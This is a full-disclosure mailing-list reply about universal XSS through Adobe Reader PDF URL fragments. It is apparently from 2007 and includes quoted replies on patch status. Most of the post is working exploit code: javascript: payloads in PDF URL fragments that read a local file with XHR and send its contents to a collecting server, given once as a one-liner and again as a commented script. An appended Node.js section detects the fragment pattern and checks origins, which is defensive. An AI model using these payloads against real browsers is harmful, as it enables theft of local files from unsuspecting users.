
[WEB SECURITY] Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous




I'm trying to put together a demonstration of this vulnerability, and how it
could affect corporate security; however, I'm encountering a large hangup
when sending a file 'back' to the webserver: the browser's same-origin policy
denies me the ability to send files to a different domain, which AFAIK is
necessary for an external attacker to properly exploit this vulnerability.

Here's the code I have so far, based more or less on PDP's.

Vanilla, almost PDP's (different URL, spaces removed, etc.):
file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

What I'm trying to do:
file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + encodeURIComponent(xhr.responseText), true);xhr2.onreadystatechange = function(){if (xhr2.readyState == 4)alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

Now, one would think that the LOCAL file operating mode of IE would allow
the cross-domain XHR request; however, this does not work (tested on IE 6), I
think because by default IE disallows JavaScript access in the local
context.

Try putting this in IE:
file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol')
and then try it in Firefox.

It won't work in IE 6, but it executes just fine in Firefox.

function cXHR(){ // Grabs a legit XHR: MSXML ActiveX first (IE), then the native object.
    try{
        return new ActiveXObject('Msxml2.XMLHTTP');
    }catch(e){}
    try{
        return new ActiveXObject('Microsoft.XMLHTTP');
    }catch(e){}
    try{
        return new XMLHttpRequest();
    }catch(e){}
    return null;
}
var xhr = cXHR();  // For grabbing the local file
var xhr2 = cXHR(); // For sending it to the collecting server
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        // URL-encode the file body so newlines, '#' and '&' in it don't break the query string.
        xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + encodeURIComponent(xhr.responseText), true); // Send it up, yo.
        xhr2.onreadystatechange = function(){
            if (xhr2.readyState == 4){ // Fires on every state change; only report once, on completion.
                alert('File Transferred!');
            }
        };
        xhr2.send(null);
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);
xhr.send(null);

Anyone's input on this matter would be appreciated.

On 1/4/07, Juha-Matti Laurio <juha-matti.laurio@netti.fi> wrote:
>
> Additionally, the public PoC doesn't work on Preview version 3.0.8 (409)
> on OS X 10.4.8.
>
> - Juha-Matti
>
> Larry Seltzer <Larry@larryseltzer.com> wrote:
> > >>"According to public reports, this vulnerability is addressed in Adobe
> > Acrobat Reader 8.0."
> >
> > I've actually tested it. On Reader 8 Acrobat you get a messagebox that
> > says "This operation is not allowed"
> >
> > Larry Seltzer
> > eWEEK.com Security Center Editor
> > http://security.eweek.com/
> > http://blog.eweek.com/blogs/larry%5Fseltzer/
> > Contributing Editor, PC Magazine
> > larryseltzer@ziffdavis.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
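
Added example, not from the original post and not PDP's PoC: the two checks
that decide the question asked above, written as plain Node.js so they run
without a browser. One pulls the "#name=javascript:" payload shape out of a PDF
URL the way the Reader plugin's open-parameter fragment carried it; the other
computes the (scheme, host, port) origin tuple for the page the payload runs in
and for the exfiltration target, which is what the same-origin policy compares.
The function names, the default-port table, and the sample URLs (built from the
PoC and the localhost target quoted above) are my assumptions; treating a
file: URL as an opaque origin that is never same-origin with anything matches
browser behaviour but is a modelling choice here, not something the post states.

```javascript
// Added example (not from the original post or PDP's PoC): two checks behind
// the question above, in plain Node.js with no dependencies.
//   1. looksLikePdfFragmentInjection(): does a URL carry the "#name=javascript:"
//      shape the Reader plugin executed?
//   2. isSameOrigin(): is the page the payload runs in same-origin with the
//      host the exfil XHR targets? This is what the browser's SOP decides on.
// Function names, DEFAULT_PORTS and the SAMPLE URLs are assumptions of mine.

// Default ports, so "http://localhost" and "http://localhost:80" compare equal.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ftp:': '21' };

// Origin as a (scheme, host, port) triple. A file: URL has no host and browsers
// give it an opaque origin, modelled here as null: it is never same-origin
// with anything, not even another file: URL.
function originOf(urlString) {
  const u = new URL(urlString);
  if (u.protocol === 'file:') return null;
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || DEFAULT_PORTS[u.protocol] || '',
  };
}

// The same-origin policy compares exactly these three parts, nothing else.
function isSameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  if (oa === null || ob === null) return false;
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

// Split "#name=value&name2=value2" into {name, value} pairs. Values are
// percent-decoded so "javascript%3A" and "javascript:" look the same; a
// malformed escape is kept verbatim instead of throwing.
function fragmentParams(urlString) {
  const hash = new URL(urlString).hash.replace(/^#/, '');
  if (hash === '') return [];
  return hash.split('&').map((pair) => {
    const eq = pair.indexOf('=');
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const raw = eq < 0 ? '' : pair.slice(eq + 1);
    let value;
    try {
      value = decodeURIComponent(raw);
    } catch (e) {
      value = raw;
    }
    return { name, value };
  });
}

// True when the path names a .pdf and some fragment parameter value starts
// with the javascript: scheme. Case and leading whitespace are ignored, and
// tab/CR/LF are stripped first because browsers drop those inside a scheme.
function looksLikePdfFragmentInjection(urlString) {
  const u = new URL(urlString);
  if (!/\.pdf$/i.test(u.pathname)) return false;
  return fragmentParams(urlString).some((p) => {
    const v = p.value.replace(/[\t\r\n]/g, '');
    return /^\s*javascript:/i.test(v);
  });
}

// Constructed sample input: the %20-encoded PoC URL from the post, the exfil
// target from the post, and a benign open-parameter URL for contrast.
const SAMPLE = {
  poc: "file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol')",
  exfil: 'http://localhost:80/whatever.htm?content=',
  benign: 'http://intranet.example/policy.pdf#page=3&zoom=100',
};

function demo() {
  return {
    pocFlagged: looksLikePdfFragmentInjection(SAMPLE.poc),
    benignFlagged: looksLikePdfFragmentInjection(SAMPLE.benign),
    exfilSameOrigin: isSameOrigin(SAMPLE.poc, SAMPLE.exfil),
    originOfExfil: originOf(SAMPLE.exfil),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the PDF's file: page and http://localhost:80/whatever.htm
landing in different origin tuples (file: vs http:, no host vs localhost), which
is exactly what xhr2 in the code above trips over regardless of how IE treats
script in the local zone. The detector side only sees a fragment when the URL
is captured client-side (links, bookmarks, referrers), since the part after
"#" is never sent to a server.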




Brought to you by http://www.webappsec.org